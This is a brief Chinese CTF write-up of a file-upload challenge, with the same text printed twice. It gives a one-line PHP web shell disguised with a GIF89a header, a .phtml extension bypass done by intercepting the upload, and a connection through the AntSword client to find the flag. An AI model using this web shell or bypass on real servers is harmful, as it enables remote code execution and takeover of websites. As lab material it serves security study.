构造test.php(一句话木马),内容如下
GIF89a<script language="php">eval($_POST['shell']);</script>
抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称
再用中国蚁剑链接,查找目录
可得flag
构造test.php(一句话木马),内容如下
GIF89a<script language="php">eval($_POST['shell']);</script>
抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称
再用中国蚁剑链接,查找目录
可得flag